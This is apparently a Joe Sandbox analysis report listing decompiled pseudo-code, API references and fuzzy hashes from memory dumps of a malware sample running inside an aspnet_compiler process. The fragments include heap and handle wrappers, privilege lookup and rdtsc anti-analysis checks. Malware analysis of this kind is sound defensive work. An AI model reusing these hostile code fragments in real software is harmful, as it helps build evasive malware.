                          • Source File: 00000007.00000002.356484497.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_aspnet_compiler.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateFile
                          • String ID:
                          • API String ID: 823142352-0
                          • Opcode ID: 1c49af20de0e676e2577a7926ea5841b539dd0aff2e218a69c58cee13b231836
                          • Instruction ID: 07e72d3904e353b461aae1bd80affc09cb1bcf297249dd4cb82bbd4ad5c633b3
                          • Opcode Fuzzy Hash: 1c49af20de0e676e2577a7926ea5841b539dd0aff2e218a69c58cee13b231836
                          • Instruction Fuzzy Hash: 63E026B2218509AB8B58CE89ED90DEB77EEABCC710B14860DBA5DC3640D634E8518B64
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E0041871A(void* __eax, void* __ebx, void* __fp0, intOrPtr _a4, void* _a8) {
                          				long _t13;
                          				void* _t18;
                          
                          				_t10 = _a4;
                          				_t4 = _t10 + 0x10; // 0x300
                          				_t5 = _t10 + 0xc50; // 0x409773
                          				E004191F0(_t18, _a4, _t5,  *_t4, 0, 0x2c);
                          				_t13 = NtClose(_a8); // executed
                          				return _t13;
                          			}





                          0x00418723
                          0x00418726
                          0x0041872f
                          0x00418737
                          0x00418745
                          0x00418749

                          APIs
                          • NtClose.NTDLL(00413D60,?,?,00413D60,00408B23,FFFFFFFF), ref: 00418745
                          Memory Dump Source
                          • Source File: 00000007.00000002.356484497.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_aspnet_compiler.jbxd
                          Yara matches
                          Similarity
                          • API ID: Close
                          • String ID:
                          • API String ID: 3535843008-0
                          • Opcode ID: 35af7cebd2667bef7fe4f4160076a11b67ebed903a755c023f8d550848d06776
                          • Instruction ID: dd584a900fdda4f3b25087dc5d8fab2fa8338ea3c3b99141c2286a3b9b3eb3d8
                          • Opcode Fuzzy Hash: 35af7cebd2667bef7fe4f4160076a11b67ebed903a755c023f8d550848d06776
                          • Instruction Fuzzy Hash: 8AE08C7A241210ABE710EF94CC89ED77768EF44320F008599F9089B253C634E90187A0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00418720(intOrPtr _a4, void* _a8) {
                          				long _t8;
                          				void* _t11;
                          
                          				_t5 = _a4;
                          				_t2 = _t5 + 0x10; // 0x300
                          				_t3 = _t5 + 0xc50; // 0x409773
                          				E004191F0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
                          				_t8 = NtClose(_a8); // executed
                          				return _t8;
                          			}





                          0x00418723
                          0x00418726
                          0x0041872f
                          0x00418737
                          0x00418745
                          0x00418749

                          APIs
                          • NtClose.NTDLL(00413D60,?,?,00413D60,00408B23,FFFFFFFF), ref: 00418745
                          Memory Dump Source
                          • Source File: 00000007.00000002.356484497.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_aspnet_compiler.jbxd
                          Yara matches
                          Similarity
                          • API ID: Close
                          • String ID:
                          • API String ID: 3535843008-0
                          • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                          • Instruction ID: 78d7ac03eca040244b58aa8b13355d71f7060bfbe0c396a3df5df4df45d4e392
                          • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                          • Instruction Fuzzy Hash: D4D01776200218BBE710EF99CC89EE77BACEF48760F154499BA189B242C530FA4086E0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: dbb6f62d831cc500803bb3cfbb4995767e788850486236138c32c6b2b8814f14
                          • Instruction ID: 542e96301bd3f292121838ed4eea949f75a7eb344e0f13651ab4f5c2d68b758e
                          • Opcode Fuzzy Hash: dbb6f62d831cc500803bb3cfbb4995767e788850486236138c32c6b2b8814f14
                          • Instruction Fuzzy Hash: D59002B170100403F140719944047460005A7E0341F51C012A5054595EC7A98DD576A9
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 732c8d230e47ea61b73d4aa44a32daf83ba688b9ca2c2d1d8585aa65c1f2f05f
                          • Instruction ID: d9d28db6e5bebcdad97240f3708bd2ae6f326eae5cdca4bba19761033b9a6f7f
                          • Opcode Fuzzy Hash: 732c8d230e47ea61b73d4aa44a32daf83ba688b9ca2c2d1d8585aa65c1f2f05f
                          • Instruction Fuzzy Hash: 909002A174100443F10061994414B060005E7F1341F51C016E1054595DC769CC52716A
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 8feaf524b75337277f016cf895a98b94170cc0c20bc5cdfa7959438e3b84f467
                          • Instruction ID: 542d28fe4224719d600574d0f6d775bfc70ab46344ac2a2725a8f82bfd0023e2
                          • Opcode Fuzzy Hash: 8feaf524b75337277f016cf895a98b94170cc0c20bc5cdfa7959438e3b84f467
                          • Instruction Fuzzy Hash: 89900261742041537545B19944045074006B7F0281791C013A1404991CC6769856E665
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: ec8476a5a3a863adf360d04e56c3f1792375d48eeab969e7e2b6495ee8f4fd2d
                          • Instruction ID: b84462e09b61973d1e4b25026ec8607118be767cb440c76d69ccdfab6b3af65d
                          • Opcode Fuzzy Hash: ec8476a5a3a863adf360d04e56c3f1792375d48eeab969e7e2b6495ee8f4fd2d
                          • Instruction Fuzzy Hash: F390027170100413F111619945047070009A7E0281F91C413A0414599DD7A68952B165
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 81a4a26758f80ad89242d993a933ab9a9819db2280c001c563a2288601ed3609
                          • Instruction ID: 7355a62482555786bf80b1957ec97e8a6e55cfab9678d130eec08c999cbe2429
                          • Opcode Fuzzy Hash: 81a4a26758f80ad89242d993a933ab9a9819db2280c001c563a2288601ed3609
                          • Instruction Fuzzy Hash: 24900261B0100503F10171994404616000AA7E0281F91C023A1014596ECB758992B175
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: e679f0579a601183031d9e82385cf22ac4598b6483c8490cbfeedc1a4cebd28e
                          • Instruction ID: 8be0018dd03f75ccd8cb63bb13b19ecb93a24f4af59fce89b1fd9400a27e425e
                          • Opcode Fuzzy Hash: e679f0579a601183031d9e82385cf22ac4598b6483c8490cbfeedc1a4cebd28e
                          • Instruction Fuzzy Hash: 0F90026171180043F20065A94C14B070005A7E0343F51C116A0144595CCA6588616565
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 47884c20772705fd126708e928f83b44c87bf117414d46980b5ac64966ae69cc
                          • Instruction ID: 407a788ad8eb6f5120e531b26e6c00a6bdb692537177b34b5af0949785e92618
                          • Opcode Fuzzy Hash: 47884c20772705fd126708e928f83b44c87bf117414d46980b5ac64966ae69cc
                          • Instruction Fuzzy Hash: 3990027170140403F1006199481470B0005A7E0342F51C012A1154596DC775885175B5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 35efac4de03ec8dafd67fed378024c901e94ca4d568882148bdbb20739fbc337
                          • Instruction ID: ff86bc298a0ed5c4433f55b3b28c9f2378e6ca0f6a46f6ee84d4030834e9ae8c
                          • Opcode Fuzzy Hash: 35efac4de03ec8dafd67fed378024c901e94ca4d568882148bdbb20739fbc337
                          • Instruction Fuzzy Hash: 52900261B0100043614071A988449064005BBF1251751C122A0988591DC6A9886566A9
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 6504ea9ac095ab0c98d2c5fb0b3808906787fb60af23a640be42e77ebd187dec
                          • Instruction ID: bcb3071a78016d8281ce9657f0afd0568acc81b534edf3d7cc38a02aa8074a37
                          • Opcode Fuzzy Hash: 6504ea9ac095ab0c98d2c5fb0b3808906787fb60af23a640be42e77ebd187dec
                          • Instruction Fuzzy Hash: 38900265711000032105A59907045070046A7E5391351C022F1005591CD77188616165
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: ced2cc4d9ec3333e3e5a026ba9bc2658f2d6a74b6957531ccd497b31d0dd34d5
                          • Instruction ID: 1076649f50b415b94372ed1cf5abe867c075385764d5e45edff227543ac202fe
                          • Opcode Fuzzy Hash: ced2cc4d9ec3333e3e5a026ba9bc2658f2d6a74b6957531ccd497b31d0dd34d5
                          • Instruction Fuzzy Hash: 119002A170200003610571994414616400AA7F0241B51C022E10045D1DC67588917169
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: d206ed980363bf22bc65734ed1f7a8721a218e5a229de62aa263f307d79c2cdc
                          • Instruction ID: 6942c82388e391a4882f019b81113e575fcd2924bcabacfcb11cd38a9dc62ce7
                          • Opcode Fuzzy Hash: d206ed980363bf22bc65734ed1f7a8721a218e5a229de62aa263f307d79c2cdc
                          • Instruction Fuzzy Hash: 4990027170100403F10065D954086460005A7F0341F51D012A5014596EC7B588917175
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: a8dc3bf3842021dbcc2aeafd3874e902f3ad6355ee86f5ab693a2e6a4c5b3dd5
                          • Instruction ID: 8a1cfb0aecb6a3d06861bfc71fcd3239de3bec1d73631a87822a08243bfdab60
                          • Opcode Fuzzy Hash: a8dc3bf3842021dbcc2aeafd3874e902f3ad6355ee86f5ab693a2e6a4c5b3dd5
                          • Instruction Fuzzy Hash: CC90027171114403F110619984047060005A7E1241F51C412A0814599DC7E588917166
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: fd0efeff3a8637d217de14bde4300a29320d419a7d74da02d6aefeb2fff4c071
                          • Instruction ID: 4736bd24955401f04e6688adbf7ab1a19209fe19f5a831b8d47b2abb2555b22f
                          • Opcode Fuzzy Hash: fd0efeff3a8637d217de14bde4300a29320d419a7d74da02d6aefeb2fff4c071
                          • Instruction Fuzzy Hash: A390026971300003F1807199540860A0005A7E1242F91D416A0005599CCA6588696365
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: c2df88a5cda0cd87d40df1761df03bcf832aa6b6fa577af9ecbca79802b6047d
                          • Instruction ID: 1e44073100129d8e17cf4fdffa2bb0d07742095c3316c920f0642d12fd2c270a
                          • Opcode Fuzzy Hash: c2df88a5cda0cd87d40df1761df03bcf832aa6b6fa577af9ecbca79802b6047d
                          • Instruction Fuzzy Hash: A590026170100003F140719954186064005F7F1341F51D012E0404595CDA6588566266
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 7e6aa51917ac6adb611c4e055d93114e6753e2abc5b1d10bbe68fabb71a0c2f7
                          • Instruction ID: cb48e0ce96242f2c6a522c74a8e3c849f94995aab145cb8537221fd7bdcf7303
                          • Opcode Fuzzy Hash: 7e6aa51917ac6adb611c4e055d93114e6753e2abc5b1d10bbe68fabb71a0c2f7
                          • Instruction Fuzzy Hash: C490027170100803F1807199440464A0005A7E1341F91C016A0015695DCB658A5977E5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 2fc308f1145de23a1add7aa296fc27fb1330d0d668a0c1561679628e83f7fdcf
                          • Instruction ID: ae72cf0aa7f57bd4ab83a8fdfd983fde695153e913697f65670320adf2a16f86
                          • Opcode Fuzzy Hash: 2fc308f1145de23a1add7aa296fc27fb1330d0d668a0c1561679628e83f7fdcf
                          • Instruction Fuzzy Hash: C190027170108803F1106199840474A0005A7E0341F55C412A4414699DC7E588917165
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 93%
                          			E004088E0(void* __ecx, intOrPtr _a4) {
                          				intOrPtr _v8;
                          				char _v24;
                          				char _v284;
                          				char _v804;
                          				char _v840;
                          				void* __ebx;
                          				void* __ebp;
                          				void* _t24;
                          				void* _t31;
                          				void* _t33;
                          				void* _t34;
                          				void* _t39;
                          				void* _t51;
                          				intOrPtr _t53;
                          				void* _t54;
                          				void* _t55;
                          				void* _t56;
                          				void* _t57;
                          
                          				_t53 = _a4;
                          				_t39 = 0; // executed
                          				_t24 = E00406E30(__ecx, _t53,  &_v24); // executed
                          				_t55 = _t54 + 8;
                          				if(_t24 != 0) {
                          					E00407040( &_v24,  &_v840);
                          					_t56 = _t55 + 8;
                          					do {
                          						E0041A100( &_v284, 0x104);
                          						E0041A770( &_v284,  &_v804);
                          						_t57 = _t56 + 0x10;
                          						_t51 = 0x4f;
                          						while(1) {
                          							_t31 = E00413E00(E00413DA0(_t39, _t53, _t51),  &_v284);
                          							_t57 = _t57 + 0x10;
                          							if(_t31 != 0) {
                          								break;
                          							}
                          							_t51 = _t51 + 1;
                          							if(_t51 <= 0x62) {
                          								continue;
                          							} else {
                          							}
                          							goto L8;
                          						}
                          						_t9 = _t53 + 0x14; // 0xffffe1a5
                          						 *(_t53 + 0x474) =  *(_t53 + 0x474) ^  *_t9;
                          						_t39 = 1;
                          						L8:
                          						_t33 = E00407070( &_v24,  &_v840);
                          						_t56 = _t57 + 8;
                          					} while (_t33 != 0 && _t39 == 0);
                          					_t34 = E004070F0(_t53,  &_v24); // executed
                          					if(_t39 == 0) {
                          						asm("rdtsc");
                          						asm("rdtsc");
                          						_v8 = _t34 - 0 + _t34;
                          						 *((intOrPtr*)(_t53 + 0x55c)) =  *((intOrPtr*)(_t53 + 0x55c)) + 0xffffffba;
                          					}
                          					 *((intOrPtr*)(_t53 + 0x31)) =  *((intOrPtr*)(_t53 + 0x31)) + _t39;
                          					_t20 = _t53 + 0x31; // 0x5608758b
                          					 *((intOrPtr*)(_t53 + 0x32)) =  *((intOrPtr*)(_t53 + 0x32)) +  *_t20 + 1;
                          					return 1;
                          				} else {
                          					return _t24;
                          				}
                          			}





















                          0x004088eb
                          0x004088f3
                          0x004088f5
                          0x004088fa
                          0x004088ff
                          0x00408912
                          0x00408917
                          0x00408920
                          0x0040892c
                          0x0040893f
                          0x00408944
                          0x00408947
                          0x00408950
                          0x00408962
                          0x00408967
                          0x0040896c
                          0x00000000
                          0x00000000
                          0x0040896e
                          0x00408972
                          0x00000000
                          0x00000000
                          0x00408974
                          0x00000000
                          0x00408972
                          0x00408976
                          0x00408979
                          0x0040897f
                          0x00408981
                          0x0040898c
                          0x00408991
                          0x00408994
                          0x004089a1
                          0x004089ac
                          0x004089ae
                          0x004089b4
                          0x004089b8
                          0x004089bb
                          0x004089bb
                          0x004089c2
                          0x004089c5
                          0x004089ca
                          0x004089d7
                          0x00408906
                          0x00408906
                          0x00408906

                          Memory Dump Source
                          • Source File: 00000007.00000002.356484497.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_aspnet_compiler.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9486f5e49d764a92f151d77217a9e0cba6cb209ca71685294e9262afbb7a2405
                          • Instruction ID: 226e528ef8d89cf76aa3651449dca84ee2c763c0567bc665b78f2505a73a72ae
                          • Opcode Fuzzy Hash: 9486f5e49d764a92f151d77217a9e0cba6cb209ca71685294e9262afbb7a2405
                          • Instruction Fuzzy Hash: B521F8B2D4420957CB15E6649E42AFF73AC9B50304F04057FE989A2181FA39AB498BA7
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 6 4188c0-4188f1 call 4191f0 RtlAllocateHeap
                          C-Code - Quality: 100%
                          			E004188C0(intOrPtr _a4, char _a8, long _a12, long _a16) {
                          				void* _t10;
                          				void* _t15;
                          
                          				E004191F0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
                          				_t6 =  &_a8; // 0x413546
                          				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
                          				return _t10;
                          			}





                          0x004188d7
                          0x004188e2
                          0x004188ed
                          0x004188f1

                          APIs
                          • RtlAllocateHeap.NTDLL(F5A,?,00413CBF,00413CBF,?,00413546,?,?,?,?,?,00000000,00408B23,?), ref: 004188ED
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.356484497.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_aspnet_compiler.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocateHeap
                          • String ID: F5A
                          • API String ID: 1279760036-683449296
                          • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                          • Instruction ID: c53d960059fd60d51188ffd50ae561d8054dda033e2458622c390dbd27fda9b7
                          • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                          • Instruction Fuzzy Hash: 61E012B1200208ABDB14EF99CC85EA777ACAF88654F118559FE085B242C630F914CAB0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 204 407290-4072da call 41a150 call 41ad30 call 409b50 call 413e60 213 4072dc-4072ee PostThreadMessageW 204->213 214 40730e-407312 204->214 215 4072f0-40730a call 4092b0 213->215 216 40730d 213->216 215->216 216->214
                          C-Code - Quality: 82%
                          			E00407290(void* __eflags, intOrPtr _a4, long _a8) {
                          				char _v67;
                          				char _v68;
                          				void* _t12;
                          				intOrPtr* _t13;
                          				int _t14;
                          				long _t21;
                          				intOrPtr* _t25;
                          				void* _t26;
                          				void* _t30;
                          
                          				_t30 = __eflags;
                          				_v68 = 0;
                          				E0041A150( &_v67, 0, 0x3f);
                          				E0041AD30( &_v68, 3);
                          				_t12 = E00409B50(_t30, _a4 + 0x1c,  &_v68); // executed
                          				_t13 = E00413E60(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
                          				_t25 = _t13;
                          				if(_t25 != 0) {
                          					_t21 = _a8;
                          					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
                          					_t32 = _t14;
                          					if(_t14 == 0) {
                          						_t14 =  *_t25(_t21, 0x8003, _t26 + (E004092B0(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
                          					}
                          					return _t14;
                          				}
                          				return _t13;
                          			}












                          0x00407290
                          0x0040729f
                          0x004072a3
                          0x004072ae
                          0x004072be
                          0x004072ce
                          0x004072d3
                          0x004072da
                          0x004072dd
                          0x004072ea
                          0x004072ec
                          0x004072ee
                          0x0040730b
                          0x0040730b
                          0x00000000
                          0x0040730d
                          0x00407312

                          APIs
                          • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072EA
                          Memory Dump Source
                          • Source File: 00000007.00000002.356484497.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_aspnet_compiler.jbxd
                          Yara matches
                          Similarity
                          • API ID: MessagePostThread
                          • String ID:
                          • API String ID: 1836367815-0
                          • Opcode ID: c0b1965486bbed21c20c63ece949b1f46c1b03fe5ed161d661499a1b38bcdbd6
                          • Instruction ID: ba3d5bcfed237746ec30380b6ed14dc4a9f69b7da918f5ae44e724b0e7605d49
                          • Opcode Fuzzy Hash: c0b1965486bbed21c20c63ece949b1f46c1b03fe5ed161d661499a1b38bcdbd6
                          • Instruction Fuzzy Hash: 9C01A771A8032876E721B6959C03FFF776C5B00B55F04011AFF04BA2C2E6A8790687FA
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 251 418a51-418a7a call 4191f0 253 418a7f-418a94 LookupPrivilegeValueW 251->253
                          C-Code - Quality: 53%
                          			E00418A51(void* __ebx, void* __edi, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16, void* _a2088790614) {
                          				int _t13;
                          
                          				asm("outsb");
                          				_push(__edi);
                          				asm("aas");
                          				 *0x8b558fa6 =  *0x8b558fa6 | 0x000000ec;
                          				_t10 = _a4;
                          				E004191F0(__edi, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_t10 + 0xa18)), 0, 0x46);
                          				_t13 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                          				return _t13;
                          			}




                          0x00418a51
                          0x00418a52
                          0x00418a5b
                          0x00418a5c
                          0x00418a63
                          0x00418a7a
                          0x00418a90
                          0x00418a94

                          APIs
                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFD2,0040CFD2,00000041,00000000,?,00408B95), ref: 00418A90
                          Memory Dump Source
                          • Source File: 00000007.00000002.356484497.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_aspnet_compiler.jbxd
                          Yara matches
                          Similarity
                          • API ID: LookupPrivilegeValue
                          • String ID:
                          • API String ID: 3899507212-0
                          • Opcode ID: 37f4abe833a8d540075a7baa7b15224306e999c61fc0bd3d87f138cc4617f2f8
                          • Instruction ID: 2a7d6a6f0d6ce7fa1933b83a8739739f908d572b6b95493c7bb5d81be50ce14c
                          • Opcode Fuzzy Hash: 37f4abe833a8d540075a7baa7b15224306e999c61fc0bd3d87f138cc4617f2f8
                          • Instruction Fuzzy Hash: FDE02BB52002847BD720DF58CC44FD73B69EF85324F008159FE1957682C634D800C7B4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 254 418900-418931 call 4191f0 RtlFreeHeap
                          C-Code - Quality: 100%
                          			E00418900(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                          				char _t10;
                          				void* _t15;
                          
                          				_t3 = _a4 + 0xc74; // 0xc74
                          				E004191F0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                          				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                          				return _t10;
                          			}





                          0x0041890f
                          0x00418917
                          0x0041892d
                          0x00418931

                          APIs
                          • RtlFreeHeap.NTDLL(00000060,00408B23,?,?,00408B23,00000060,00000000,00000000,?,?,00408B23,?,00000000), ref: 0041892D
                          Memory Dump Source
                          • Source File: 00000007.00000002.356484497.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_aspnet_compiler.jbxd
                          Yara matches
                          Similarity
                          • API ID: FreeHeap
                          • String ID:
                          • API String ID: 3298025750-0
                          • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                          • Instruction ID: 5f54135a6d5665afae9514b011c4f342711cdf5a633985feeb8d835705c457f1
                          • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                          • Instruction Fuzzy Hash: 98E012B1200208ABDB18EF99CC89EA777ACAF88750F018559FE085B242C630E914CAB0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 257 418933-418959 258 41895f-41896c ExitProcess 257->258 259 41895a call 4191f0 257->259 259->258
                          C-Code - Quality: 16%
                          			E00418933(intOrPtr _a4, int _a8) {
                          				void* _t11;
                          
                          				asm("fsubr qword [esi]");
                          				asm("int3");
                          				asm("fst qword [eax]");
                          				asm("int1");
                          				asm("rcr eax, 1");
                          				_push(_t14);
                          				_t6 = _a4;
                          				E004191F0(_t11, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t6 + 0xa14)), 0, 0x36);
                          				ExitProcess(_a8);
                          			}




                          0x00418935
